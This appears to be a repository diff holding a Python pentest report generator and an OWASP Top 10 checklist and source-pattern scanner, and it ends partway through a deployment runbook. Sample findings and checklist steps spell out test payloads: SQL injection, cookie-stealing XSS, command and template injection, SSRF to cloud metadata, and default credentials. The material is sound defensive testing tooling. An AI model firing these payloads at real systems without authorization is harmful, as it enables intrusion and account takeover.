effort: str = "medium" # low, medium, high — remediation effort
SEVERITY_ORDER = {"critical": 5, "high": 4, "medium": 3, "low": 2, "info": 1}
class PentestReportGenerator:
"""Generate professional penetration testing reports from structured findings."""
def __init__(self, findings: List[Finding], metadata: Optional[Dict] = None):
self.findings = sorted(findings, key=lambda f: SEVERITY_ORDER.get(f.severity, 0), reverse=True)
self.metadata = metadata or {}
self.generated_at = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def generate_markdown(self) -> str:
"""Generate a complete markdown pen test report."""
sections = []
sections.append(self._header())
sections.append(self._executive_summary())
sections.append(self._scope_section())
sections.append(self._findings_table())
sections.append(self._detailed_findings())
sections.append(self._remediation_matrix())
sections.append(self._methodology_section())
sections.append(self._appendix())
return "\n\n".join(sections)
def generate_json(self) -> Dict:
"""Generate structured JSON report."""
return {
"report_metadata": {
"title": self.metadata.get("title", "Penetration Test Report"),
"target": self.metadata.get("target", "Not specified"),
"tester": self.metadata.get("tester", "Not specified"),
"date_range": self.metadata.get("date_range", "Not specified"),
"generated_at": self.generated_at,
"overall_risk_score": self._calculate_risk_score(),
"overall_risk_level": self._risk_level(),
},
"summary": {
"total_findings": len(self.findings),
"critical": len([f for f in self.findings if f.severity == "critical"]),
"high": len([f for f in self.findings if f.severity == "high"]),
"medium": len([f for f in self.findings if f.severity == "medium"]),
"low": len([f for f in self.findings if f.severity == "low"]),
"info": len([f for f in self.findings if f.severity == "info"]),
},
"findings": [asdict(f) for f in self.findings],
"remediation_priority": self._remediation_priority_list(),
}
def _header(self) -> str:
title = self.metadata.get("title", "Penetration Test Report")
target = self.metadata.get("target", "Not specified")
tester = self.metadata.get("tester", "Not specified")
date_range = self.metadata.get("date_range", "Not specified")
lines = [
f"# {title}",
"",
"| Field | Value |",
"|-------|-------|",
f"| **Target** | {target} |",
f"| **Tester** | {tester} |",
f"| **Date Range** | {date_range} |",
f"| **Report Generated** | {self.generated_at} |",
f"| **Overall Risk** | {self._risk_level()} (Score: {self._calculate_risk_score():.1f}/10) |",
f"| **Total Findings** | {len(self.findings)} |",
]
return "\n".join(lines)
def _executive_summary(self) -> str:
critical = len([f for f in self.findings if f.severity == "critical"])
high = len([f for f in self.findings if f.severity == "high"])
medium = len([f for f in self.findings if f.severity == "medium"])
low = len([f for f in self.findings if f.severity == "low"])
info = len([f for f in self.findings if f.severity == "info"])
risk_score = self._calculate_risk_score()
risk_level = self._risk_level()
lines = [
"## Executive Summary",
"",
f"This penetration test identified **{len(self.findings)} findings** across the target application. "
f"The overall risk level is **{risk_level}** with a score of **{risk_score:.1f}/10**.",
"",
"### Finding Severity Distribution",
"",
"| Severity | Count |",
"|----------|-------|",
f"| Critical | {critical} |",
f"| High | {high} |",
f"| Medium | {medium} |",
f"| Low | {low} |",
f"| Informational | {info} |",
]
# Top 3 findings
if self.findings:
lines.append("")
lines.append("### Top Priority Findings")
lines.append("")
for i, f in enumerate(self.findings[:3], 1):
lines.append(f"{i}. **{f.title}** ({f.severity.upper()}, CVSS {f.cvss_score}) — {f.impact[:120]}")
# Risk assessment
lines.append("")
if critical > 0:
lines.append("> **CRITICAL RISK**: Immediate remediation required. Critical vulnerabilities "
"allow attackers to compromise the system with minimal effort.")
elif high > 0:
lines.append("> **HIGH RISK**: Prompt remediation recommended. High-severity vulnerabilities "
"pose significant risk of exploitation.")
elif medium > 0:
lines.append("> **MODERATE RISK**: Remediation should be planned within the next sprint. "
"Medium findings may be chained for greater impact.")
else:
lines.append("> **LOW RISK**: The application has a reasonable security posture. "
"Address low-severity findings during regular maintenance.")
return "\n".join(lines)
def _scope_section(self) -> str:
scope = self.metadata.get("scope", "Full application security assessment")
exclusions = self.metadata.get("exclusions", "None specified")
test_type = self.metadata.get("test_type", "Gray box")
lines = [
"## Scope",
"",
f"- **In Scope**: {scope}",
f"- **Exclusions**: {exclusions}",
f"- **Test Type**: {test_type}",
]
return "\n".join(lines)
def _findings_table(self) -> str:
lines = [
"## Findings Overview",
"",
"| # | Severity | CVSS | Title | Category |",
"|---|----------|------|-------|----------|",
]
for i, f in enumerate(self.findings, 1):
sev_badge = f.severity.upper()
lines.append(f"| {i} | {sev_badge} | {f.cvss_score} | {f.title} | {f.category} |")
return "\n".join(lines)
def _detailed_findings(self) -> str:
lines = ["## Detailed Findings"]
for i, f in enumerate(self.findings, 1):
lines.append("")
lines.append(f"### {i}. {f.title}")
lines.append("")
lines.append(f"**Severity:** {f.severity.upper()} | **CVSS:** {f.cvss_score}"
+ (f" | **Vector:** `{f.cvss_vector}`" if f.cvss_vector else ""))
lines.append(f"**Category:** {f.category}")
lines.append("")
lines.append("#### Description")
lines.append("")
lines.append(f"{f.description}")
lines.append("")
lines.append("#### Evidence")
lines.append("")
lines.append("```")
lines.append(f"{f.evidence}")
lines.append("```")
lines.append("")
lines.append("#### Impact")
lines.append("")
lines.append(f"{f.impact}")
lines.append("")
lines.append("#### Remediation")
lines.append("")
lines.append(f"{f.remediation}")
if f.references:
lines.append("")
lines.append("#### References")
lines.append("")
for ref in f.references:
lines.append(f"- {ref}")
return "\n".join(lines)
def _remediation_matrix(self) -> str:
lines = [
"## Remediation Priority Matrix",
"",
"Prioritize remediation based on severity and effort:",
"",
"| # | Finding | Severity | Effort | Priority |",
"|---|---------|----------|--------|----------|",
]
for i, f in enumerate(self.findings, 1):
priority = self._compute_priority(f)
lines.append(f"| {i} | {f.title} | {f.severity.upper()} | {f.effort} | {priority} |")
lines.append("")
lines.append("**Priority Key:** P1 = Fix immediately, P2 = Fix this sprint, "
"P3 = Fix this quarter, P4 = Backlog")
return "\n".join(lines)
def _methodology_section(self) -> str:
lines = [
"## Methodology",
"",
"Testing followed the OWASP Testing Guide v4.2 and PTES (Penetration Testing Execution Standard):",
"",
"1. **Reconnaissance** — Mapped attack surface, identified endpoints and technologies",
"2. **Vulnerability Discovery** — Automated scanning + manual testing for OWASP Top 10",
"3. **Exploitation** — Validated findings with proof-of-concept (non-destructive)",
"4. **Post-Exploitation** — Assessed lateral movement and data access potential",
"5. **Reporting** — Documented findings with evidence and remediation guidance",
]
return "\n".join(lines)
def _appendix(self) -> str:
lines = [
"## Appendix",
"",
"### CVSS Scoring Reference",
"",
"| Score Range | Severity |",
"|-------------|----------|",
"| 9.0 - 10.0 | Critical |",
"| 7.0 - 8.9 | High |",
"| 4.0 - 6.9 | Medium |",
"| 0.1 - 3.9 | Low |",
"| 0.0 | Informational |",
"",
"### Disclaimer",
"",
"This report represents a point-in-time assessment. New vulnerabilities may emerge after "
"the testing period. Regular security assessments are recommended.",
"",
f"---\n\n*Report generated on {self.generated_at}*",
]
return "\n".join(lines)
def _calculate_risk_score(self) -> float:
"""Calculate overall risk score (0-10) based on findings."""
if not self.findings:
return 0.0
# Weighted by severity
weights = {"critical": 10, "high": 7, "medium": 4, "low": 1.5, "info": 0.5}
total_weight = sum(weights.get(f.severity, 0) for f in self.findings)
# Normalize: cap at 10, scale based on number of findings
score = min(10.0, total_weight / max(len(self.findings) * 0.5, 1))
return round(score, 1)
def _risk_level(self) -> str:
"""Return risk level string based on score."""
score = self._calculate_risk_score()
if score >= 9.0:
return "CRITICAL"
elif score >= 7.0:
return "HIGH"
elif score >= 4.0:
return "MEDIUM"
elif score > 0:
return "LOW"
return "NONE"
def _compute_priority(self, finding: Finding) -> str:
"""Compute remediation priority from severity and effort."""
sev = SEVERITY_ORDER.get(finding.severity, 0)
effort_map = {"low": 3, "medium": 2, "high": 1}
effort_val = effort_map.get(finding.effort, 2)
score = sev * effort_val
if score >= 12:
return "P1"
elif score >= 8:
return "P2"
elif score >= 4:
return "P3"
return "P4"
def _remediation_priority_list(self) -> List[Dict]:
"""Return ordered list of remediation priorities for JSON output."""
result = []
for f in self.findings:
result.append({
"title": f.title,
"severity": f.severity,
"effort": f.effort,
"priority": self._compute_priority(f),
"remediation": f.remediation,
})
return result
def load_findings(path: str) -> tuple:
"""Load findings from a JSON file."""
try:
content = Path(path).read_text(encoding="utf-8")
data = json.loads(content)
except (OSError, json.JSONDecodeError) as e:
print(f"Error loading findings: {e}", file=sys.stderr)
sys.exit(1)
# Support both list-of-findings and object-with-metadata formats
metadata = {}
findings_data = data
if isinstance(data, dict):
metadata = data.get("metadata", {})
findings_data = data.get("findings", [])
findings = []
for item in findings_data:
findings.append(Finding(
title=item.get("title", "Untitled Finding"),
severity=item.get("severity", "medium"),
cvss_score=float(item.get("cvss_score", 0.0)),
category=item.get("category", "Uncategorized"),
description=item.get("description", ""),
evidence=item.get("evidence", "No evidence provided"),
impact=item.get("impact", ""),
remediation=item.get("remediation", ""),
cvss_vector=item.get("cvss_vector", ""),
references=item.get("references", []),
effort=item.get("effort", "medium"),
))
return findings, metadata
def generate_sample_findings() -> str:
"""Generate a sample findings JSON for reference."""
sample = [
{
"title": "SQL Injection in Login Endpoint",
"severity": "critical",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"category": "A03:2021 - Injection",
"description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
"evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
"impact": "Full database access, authentication bypass, potential remote code execution.",
"remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
"references": ["https://cwe.mitre.org/data/definitions/89.html"],
"effort": "low"
},
{
"title": "Stored XSS in User Profile",
"severity": "high",
"cvss_score": 7.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"category": "A03:2021 - Injection",
"description": "The user profile 'bio' field does not sanitize HTML input.",
"evidence": "Submitted <img src=x onerror=alert(document.cookie)> in bio field.\nVisiting the profile page executes the payload.",
"impact": "Session hijacking, account takeover, phishing via stored malicious content.",
"remediation": "Sanitize all user input with DOMPurify. Implement Content-Security-Policy.",
"references": ["https://cwe.mitre.org/data/definitions/79.html"],
"effort": "low"
}
]
return json.dumps(sample, indent=2)
def main():
parser = argparse.ArgumentParser(
description="Pen Test Report Generator — Generate professional penetration testing reports from structured findings.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --findings findings.json --format md --output report.md
%(prog)s --findings findings.json --format json
%(prog)s --sample > sample_findings.json
Findings JSON format:
A JSON array of objects with: title, severity, cvss_score, category,
description, evidence, impact, remediation, cvss_vector, references, effort.
Use --sample to generate a template.
""",
)
parser.add_argument("--findings", metavar="FILE",
help="Path to findings JSON file")
parser.add_argument("--format", choices=["md", "json"], default="md",
help="Output format (default: md)")
parser.add_argument("--output", metavar="FILE",
help="Output file path (default: stdout)")
parser.add_argument("--json", action="store_true", dest="json_shortcut",
help="Shortcut for --format json")
parser.add_argument("--sample", action="store_true",
help="Print sample findings JSON and exit")
args = parser.parse_args()
if args.sample:
print(generate_sample_findings())
return
if not args.findings:
parser.error("--findings is required (use --sample to generate a template)")
if not Path(args.findings).exists():
print(f"Error: File not found: {args.findings}", file=sys.stderr)
sys.exit(1)
output_format = "json" if args.json_shortcut else args.format
findings, metadata = load_findings(args.findings)
if not findings:
print("No findings loaded. Check the JSON file format.", file=sys.stderr)
sys.exit(1)
generator = PentestReportGenerator(findings=findings, metadata=metadata)
if output_format == "json":
result = json.dumps(generator.generate_json(), indent=2)
else:
result = generator.generate_markdown()
if args.output:
Path(args.output).write_text(result, encoding="utf-8")
print(f"Report written to {args.output}")
else:
print(result)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,545 @@
#!/usr/bin/env python3
"""
Vulnerability Scanner - Generate OWASP Top 10 security checklists and scan for common patterns.
Table of Contents:
VulnerabilityScanner - Main class for vulnerability scanning
__init__ - Initialize with target type and scope
generate_checklist - Generate OWASP Top 10 checklist for target
scan_source - Scan source directory for vulnerability patterns
_scan_file - Scan individual file for regex patterns
_get_owasp_checks - Return OWASP checks for target type
main() - CLI entry point
Usage:
python vulnerability_scanner.py --target web --scope full
python vulnerability_scanner.py --target api --scope quick --json
python vulnerability_scanner.py --target web --source /path/to/code --scope full
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
@dataclass
class CheckItem:
"""A single check item in the OWASP checklist."""
owasp_id: str
owasp_category: str
check_id: str
title: str
description: str
test_procedure: str
severity: str # critical, high, medium, low, info
applicable_targets: List[str] = field(default_factory=list)
status: str = "pending" # pending, pass, fail, na
@dataclass
class SourceFinding:
"""A vulnerability pattern found in source code."""
rule_id: str
title: str
severity: str
owasp_category: str
file_path: str
line_number: int
code_snippet: str
recommendation: str
class VulnerabilityScanner:
"""Generate OWASP Top 10 checklists and scan source code for vulnerability patterns."""
SCAN_EXTENSIONS = {
".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go",
".rb", ".php", ".cs", ".rs", ".html", ".vue", ".svelte",
}
SKIP_DIRS = {
"node_modules", ".git", "__pycache__", ".venv", "venv",
"vendor", "dist", "build", ".next", "target",
}
def __init__(self, target: str = "web", scope: str = "full", source: Optional[str] = None):
self.target = target
self.scope = scope
self.source = source
def generate_checklist(self) -> List[CheckItem]:
"""Generate OWASP Top 10 checklist for the given target and scope."""
all_checks = self._get_owasp_checks()
filtered = []
for check in all_checks:
if self.target not in check.applicable_targets and "all" not in check.applicable_targets:
continue
if self.scope == "quick" and check.severity in ("low", "info"):
continue
filtered.append(check)
return filtered
def scan_source(self, path: str) -> List[SourceFinding]:
"""Scan source directory for common vulnerability patterns."""
findings = []
source_path = Path(path)
if not source_path.exists():
return findings
for root, dirs, files in os.walk(source_path):
dirs[:] = [d for d in dirs if d not in self.SKIP_DIRS]
for fname in files:
fpath = Path(root) / fname
if fpath.suffix in self.SCAN_EXTENSIONS:
findings.extend(self._scan_file(fpath))
return findings
def _scan_file(self, file_path: Path) -> List[SourceFinding]:
"""Scan a single file for vulnerability patterns."""
findings = []
try:
content = file_path.read_text(encoding="utf-8", errors="ignore")
except (OSError, PermissionError):
return findings
patterns = [
{
"rule_id": "SQLI-001",
"title": "Potential SQL Injection (string concatenation)",
"severity": "critical",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''(?:execute|query|cursor\.execute)\s*\(\s*(?:f["\']|["\'].*%s|["\'].*\+\s*\w+|["\'].*\.format)''',
"recommendation": "Use parameterized queries or prepared statements instead of string concatenation.",
"extensions": {".py", ".js", ".ts", ".java", ".rb", ".php"},
},
{
"rule_id": "SQLI-002",
"title": "Potential SQL Injection (template literal)",
"severity": "critical",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''(?:query|execute|raw)\s*\(\s*`[^`]*\$\{''',
"recommendation": "Use parameterized queries. Never interpolate user input into SQL strings.",
"extensions": {".js", ".ts", ".jsx", ".tsx"},
},
{
"rule_id": "XSS-001",
"title": "Potential DOM-based XSS (innerHTML)",
"severity": "high",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''\.innerHTML\s*=\s*(?!['"][^'"]*['"])''',
"recommendation": "Use textContent or a sanitization library (DOMPurify) instead of innerHTML.",
"extensions": {".js", ".ts", ".jsx", ".tsx", ".html", ".vue", ".svelte"},
},
{
"rule_id": "XSS-002",
"title": "React dangerouslySetInnerHTML usage",
"severity": "high",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''dangerouslySetInnerHTML''',
"recommendation": "Sanitize HTML with DOMPurify before using dangerouslySetInnerHTML.",
"extensions": {".jsx", ".tsx", ".js", ".ts"},
},
{
"rule_id": "CMDI-001",
"title": "Potential Command Injection (shell=True)",
"severity": "critical",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''subprocess\.\w+\(.*shell\s*=\s*True''',
"recommendation": "Avoid shell=True. Use subprocess with a list of arguments instead.",
"extensions": {".py"},
},
{
"rule_id": "CMDI-002",
"title": "Potential Command Injection (eval/exec)",
"severity": "critical",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''(?:^|\s)(?:eval|exec)\s*\((?!.*(?:#\s*nosec|NOSONAR))''',
"recommendation": "Never use eval() or exec() with untrusted input. Use ast.literal_eval() for data parsing.",
"extensions": {".py", ".js", ".ts"},
},
{
"rule_id": "SEC-001",
"title": "Hardcoded Secret or API Key",
"severity": "critical",
"owasp_category": "A02:2021 - Cryptographic Failures",
"pattern": r'''(?i)(?:api[_-]?key|secret[_-]?key|password|passwd|token)\s*[:=]\s*['\"][a-zA-Z0-9+/=]{16,}['\"]''',
"recommendation": "Move secrets to environment variables or a secrets manager (Vault, AWS Secrets Manager).",
"extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", ".rb", ".php"},
},
{
"rule_id": "SEC-002",
"title": "AWS Access Key ID detected",
"severity": "critical",
"owasp_category": "A02:2021 - Cryptographic Failures",
"pattern": r'''AKIA[0-9A-Z]{16}''',
"recommendation": "Remove the AWS key immediately. Rotate the credential and use IAM roles or environment variables.",
"extensions": None, # scan all files
},
{
"rule_id": "CRYPTO-001",
"title": "Weak hashing algorithm (MD5/SHA1)",
"severity": "high",
"owasp_category": "A02:2021 - Cryptographic Failures",
"pattern": r'''(?:md5|sha1)\s*\(''',
"recommendation": "Use bcrypt, scrypt, or argon2 for passwords. Use SHA-256+ for integrity checks.",
"extensions": {".py", ".js", ".ts", ".java", ".go", ".rb", ".php"},
},
{
"rule_id": "SSRF-001",
"title": "Potential SSRF (user-controlled URL in HTTP request)",
"severity": "high",
"owasp_category": "A10:2021 - SSRF",
"pattern": r'''(?:requests\.get|fetch|axios|http\.get|urllib\.request\.urlopen)\s*\(\s*(?:request\.|req\.|params|args|input|user)''',
"recommendation": "Validate and allowlist URLs before making outbound requests. Block internal IPs.",
"extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go"},
},
{
"rule_id": "PATH-001",
"title": "Potential Path Traversal",
"severity": "high",
"owasp_category": "A01:2021 - Broken Access Control",
"pattern": r'''(?:open|readFile|readFileSync|Path\.join)\s*\(.*(?:request\.|req\.|params|args|input|user)''',
"recommendation": "Sanitize file paths. Use os.path.basename() and validate against an allowlist.",
"extensions": {".py", ".js", ".ts", ".java", ".go"},
},
{
"rule_id": "DESER-001",
"title": "Unsafe Deserialization (pickle/yaml.load)",
"severity": "critical",
"owasp_category": "A08:2021 - Software and Data Integrity Failures",
"pattern": r'''(?:pickle\.load|yaml\.load\s*\([^)]*\)\s*(?!.*Loader\s*=\s*yaml\.SafeLoader))''',
"recommendation": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data.",
"extensions": {".py"},
},
{
"rule_id": "AUTH-001",
"title": "JWT with hardcoded secret",
"severity": "critical",
"owasp_category": "A07:2021 - Identification and Authentication Failures",
"pattern": r'''jwt\.(?:encode|sign)\s*\([^)]*['\"][a-zA-Z0-9]{8,}['\"]''',
"recommendation": "Load JWT secrets from environment variables. Use RS256 with key pairs for production.",
"extensions": {".py", ".js", ".ts"},
},
]
lines = content.split("\n")
for i, line in enumerate(lines, 1):
for pat in patterns:
exts = pat.get("extensions")
if exts and file_path.suffix not in exts:
continue
if re.search(pat["pattern"], line):
findings.append(SourceFinding(
rule_id=pat["rule_id"],
title=pat["title"],
severity=pat["severity"],
owasp_category=pat["owasp_category"],
file_path=str(file_path),
line_number=i,
code_snippet=line.strip()[:200],
recommendation=pat["recommendation"],
))
return findings
def _get_owasp_checks(self) -> List[CheckItem]:
"""Return comprehensive OWASP Top 10 checklist items."""
checks = [
# A01: Broken Access Control
CheckItem("A01", "Broken Access Control", "A01-01",
"Horizontal Privilege Escalation",
"Verify users cannot access other users' resources by changing IDs.",
"Change resource IDs in API requests (e.g., /users/123 → /users/124). Expect 403.",
"critical", ["web", "api", "all"]),
CheckItem("A01", "Broken Access Control", "A01-02",
"Vertical Privilege Escalation",
"Verify regular users cannot access admin endpoints.",
"Authenticate as regular user, request admin endpoints. Expect 403.",
"critical", ["web", "api", "all"]),
CheckItem("A01", "Broken Access Control", "A01-03",
"CORS Misconfiguration",
"Verify CORS policy does not allow arbitrary origins.",
"Send request with Origin: https://evil.com. Check Access-Control-Allow-Origin.",
"high", ["web", "api"]),
CheckItem("A01", "Broken Access Control", "A01-04",
"Forced Browsing",
"Check for unprotected admin or debug pages.",
"Request /admin, /debug, /api/admin, /.env, /swagger. Expect 403 or 404.",
"high", ["web", "all"]),
CheckItem("A01", "Broken Access Control", "A01-05",
"Directory Listing",
"Verify directory listing is disabled on the web server.",
"Request directory paths without index file. Should not list contents.",
"medium", ["web"]),
# A02: Cryptographic Failures
CheckItem("A02", "Cryptographic Failures", "A02-01",
"TLS Version Check",
"Ensure TLS 1.2+ is enforced. Reject TLS 1.0/1.1.",
"Run: nmap --script ssl-enum-ciphers -p 443 target.com",
"high", ["web", "api", "all"]),
CheckItem("A02", "Cryptographic Failures", "A02-02",
"Password Hashing Algorithm",
"Verify passwords use bcrypt/scrypt/argon2 with adequate cost.",
"Review authentication code for hashing implementation.",
"critical", ["web", "api", "all"]),
CheckItem("A02", "Cryptographic Failures", "A02-03",
"Sensitive Data in URLs",
"Check for tokens, passwords, or PII in query parameters.",
"Review access logs and URL patterns for sensitive query params.",
"high", ["web", "api"]),
CheckItem("A02", "Cryptographic Failures", "A02-04",
"HSTS Header",
"Verify Strict-Transport-Security header is present.",
"Check response headers for HSTS with max-age >= 31536000.",
"medium", ["web"]),
# A03: Injection
CheckItem("A03", "Injection", "A03-01",
"SQL Injection",
"Test input fields for SQL injection vulnerabilities.",
"Submit ' OR 1=1-- in input fields. Check for errors or unexpected behavior.",
"critical", ["web", "api", "all"]),
CheckItem("A03", "Injection", "A03-02",
"XSS (Cross-Site Scripting)",
"Test for reflected, stored, and DOM-based XSS.",
"Submit <script>alert(1)</script> in input fields. Check if rendered.",
"high", ["web", "all"]),
CheckItem("A03", "Injection", "A03-03",
"Command Injection",
"Test for OS command injection in input fields.",
"Submit ; whoami in fields that may trigger system commands.",
"critical", ["web", "api"]),
CheckItem("A03", "Injection", "A03-04",
"Template Injection",
"Test for server-side template injection.",
"Submit {{7*7}} and ${7*7} in input fields. Check for 49 in response.",
"high", ["web", "api"]),
CheckItem("A03", "Injection", "A03-05",
"NoSQL Injection",
"Test for NoSQL injection in JSON inputs.",
"Submit {\"$gt\": \"\"} in JSON fields. Check for data leakage.",
"high", ["api"]),
# A04: Insecure Design
CheckItem("A04", "Insecure Design", "A04-01",
"Rate Limiting on Authentication",
"Verify rate limiting exists on login and password reset endpoints.",
"Send 50+ rapid login requests. Expect 429 after threshold.",
"high", ["web", "api", "all"]),
CheckItem("A04", "Insecure Design", "A04-02",
"Business Logic Abuse",
"Test for business logic flaws (negative quantities, state manipulation).",
"Try negative values, skip steps in workflows, manipulate client-side calculations.",
"high", ["web", "api"]),
CheckItem("A04", "Insecure Design", "A04-03",
"Account Lockout",
"Verify account lockout after repeated failed login attempts.",
"Submit 10+ failed login attempts. Check for lockout or CAPTCHA.",
"medium", ["web", "api"]),
# A05: Security Misconfiguration
CheckItem("A05", "Security Misconfiguration", "A05-01",
"Default Credentials",
"Check for default credentials on admin panels and services.",
"Try admin:admin, root:root, admin:password on all login forms.",
"critical", ["web", "api", "all"]),
CheckItem("A05", "Security Misconfiguration", "A05-02",
"Debug Mode in Production",
"Verify debug mode is disabled in production.",
"Trigger errors and check for stack traces, debug info, or verbose errors.",
"high", ["web", "api", "all"]),
CheckItem("A05", "Security Misconfiguration", "A05-03",
"Security Headers",
"Verify all security headers are present and properly configured.",
"Check for CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.",
"medium", ["web"]),
CheckItem("A05", "Security Misconfiguration", "A05-04",
"Unnecessary HTTP Methods",
"Verify only required HTTP methods are enabled.",
"Send OPTIONS request. Check for TRACE, DELETE on public endpoints.",
"low", ["web", "api"]),
# A06: Vulnerable Components
CheckItem("A06", "Vulnerable and Outdated Components", "A06-01",
"Dependency CVE Audit",
"Scan all dependencies for known CVEs.",
"Run npm audit, pip audit, govulncheck, or bundle audit.",
"high", ["web", "api", "mobile", "all"]),
CheckItem("A06", "Vulnerable and Outdated Components", "A06-02",
"End-of-Life Framework Check",
"Verify no EOL frameworks or languages are in use.",
"Check framework versions against vendor EOL dates.",
"medium", ["web", "api", "all"]),
# A07: Authentication Failures
CheckItem("A07", "Identification and Authentication Failures", "A07-01",
"Brute Force Protection",
"Verify brute force protection on authentication endpoints.",
"Send 100 rapid login attempts. Expect blocking after threshold.",
"high", ["web", "api", "all"]),
CheckItem("A07", "Identification and Authentication Failures", "A07-02",
"Session Management",
"Verify sessions are properly managed (HttpOnly, Secure, SameSite).",
"Check cookie flags: HttpOnly, Secure, SameSite=Strict|Lax.",
"high", ["web"]),
CheckItem("A07", "Identification and Authentication Failures", "A07-03",
"Session Invalidation on Logout",
"Verify sessions are invalidated on logout.",
"Logout, then replay the session cookie. Should receive 401.",
"high", ["web", "api"]),
CheckItem("A07", "Identification and Authentication Failures", "A07-04",
"Username Enumeration",
"Check for username enumeration via error messages.",
"Submit valid and invalid usernames. Error messages should be identical.",
"medium", ["web", "api"]),
# A08: Data Integrity
CheckItem("A08", "Software and Data Integrity Failures", "A08-01",
"Unsafe Deserialization",
"Check for unsafe deserialization of user input.",
"Review code for pickle.load(), yaml.load(), Java ObjectInputStream.",
"critical", ["web", "api"]),
CheckItem("A08", "Software and Data Integrity Failures", "A08-02",
"Subresource Integrity",
"Verify SRI hashes on CDN-loaded scripts and stylesheets.",
"Check <script> and <link> tags for integrity attributes.",
"medium", ["web"]),
# A09: Logging Failures
CheckItem("A09", "Security Logging and Monitoring Failures", "A09-01",
"Authentication Event Logging",
"Verify login success and failure events are logged.",
"Attempt valid and invalid logins. Check server logs for entries.",
"medium", ["web", "api", "all"]),
CheckItem("A09", "Security Logging and Monitoring Failures", "A09-02",
"Sensitive Data in Logs",
"Verify passwords, tokens, and PII are not logged.",
"Review log configuration and sample log output for sensitive data.",
"high", ["web", "api", "all"]),
# A10: SSRF
CheckItem("A10", "Server-Side Request Forgery", "A10-01",
"Internal Network Access via SSRF",
"Test URL input fields for SSRF vulnerabilities.",
"Submit http://169.254.169.254/ and http://127.0.0.1 in URL fields.",
"critical", ["web", "api"]),
CheckItem("A10", "Server-Side Request Forgery", "A10-02",
"DNS Rebinding",
"Test for DNS rebinding attacks on URL validators.",
"Use a DNS rebinding service to bypass allowlist validation.",
"high", ["web", "api"]),
]
return checks
def format_checklist_text(checks: List[CheckItem]) -> str:
"""Format checklist as human-readable text."""
lines = []
lines.append("=" * 70)
lines.append("OWASP TOP 10 SECURITY CHECKLIST")
lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
lines.append(f"Total checks: {len(checks)}")
lines.append("=" * 70)
current_category = ""
for check in checks:
if check.owasp_category != current_category:
current_category = check.owasp_category
lines.append(f"\n--- {check.owasp_id}: {check.owasp_category} ---\n")
sev_marker = {"critical": "[!!!]", "high": "[!! ]", "medium": "[! ]", "low": "[. ]", "info": "[ ]"}
marker = sev_marker.get(check.severity, "[ ]")
lines.append(f" {marker} [{check.check_id}] {check.title}")
lines.append(f" {check.description}")
lines.append(f" Test: {check.test_procedure}")
lines.append(f" Severity: {check.severity.upper()}")
lines.append("")
return "\n".join(lines)
def format_findings_text(findings: List[SourceFinding]) -> str:
"""Format source findings as human-readable text."""
if not findings:
return "No vulnerability patterns detected in source code."
lines = []
lines.append(f"\nSOURCE CODE FINDINGS: {len(findings)} issue(s) found\n")
by_severity = {"critical": [], "high": [], "medium": [], "low": [], "info": []}
for f in findings:
by_severity.get(f.severity, by_severity["info"]).append(f)
for sev in ["critical", "high", "medium", "low", "info"]:
group = by_severity[sev]
if not group:
continue
lines.append(f" [{sev.upper()}] ({len(group)} finding(s))")
for f in group:
lines.append(f" - {f.title} [{f.rule_id}]")
lines.append(f" File: {f.file_path}:{f.line_number}")
lines.append(f" Code: {f.code_snippet}")
lines.append(f" Fix: {f.recommendation}")
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Vulnerability Scanner — Generate OWASP Top 10 checklists and scan source code for vulnerability patterns.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --target web --scope full
%(prog)s --target api --scope quick --json
%(prog)s --target web --source /path/to/code --scope full
%(prog)s --target mobile --scope quick --json
""",
)
parser.add_argument("--target", choices=["web", "api", "mobile"], default="web",
help="Target application type (default: web)")
parser.add_argument("--scope", choices=["quick", "full"], default="full",
help="Scan scope: quick (high/critical only) or full (default: full)")
parser.add_argument("--source", metavar="PATH",
help="Optional: path to source code directory to scan for patterns")
parser.add_argument("--json", action="store_true", dest="json_output",
help="Output results as JSON")
args = parser.parse_args()
scanner = VulnerabilityScanner(target=args.target, scope=args.scope)
checklist = scanner.generate_checklist()
source_findings = []
if args.source:
source_findings = scanner.scan_source(args.source)
if args.json_output:
output = {
"scan_metadata": {
"target": args.target,
"scope": args.scope,
"source_path": args.source,
"generated_at": datetime.now().isoformat(),
"checklist_count": len(checklist),
"source_findings_count": len(source_findings),
},
"checklist": [asdict(c) for c in checklist],
"source_findings": [asdict(f) for f in source_findings],
}
print(json.dumps(output, indent=2))
else:
print(format_checklist_text(checklist))
if source_findings:
print(format_findings_text(source_findings))
elif args.source:
print("\nNo vulnerability patterns detected in source code.")
# Exit with non-zero if critical/high findings found in source scan
critical_high = [f for f in source_findings if f.severity in ("critical", "high")]
if critical_high:
sys.exit(1)
if __name__ == "__main__":
main()

View File

@@ -270,6 +270,54 @@ kubectl get pods -n production -l app=myapp
curl -sf https://app.example.com/healthz || echo "ROLLBACK FAILED — escalate"
```
## Multi-Cloud Cross-References
Use these companion skills for cloud-specific deep dives:
| Skill | Cloud | Use When |
|-------|-------|----------|
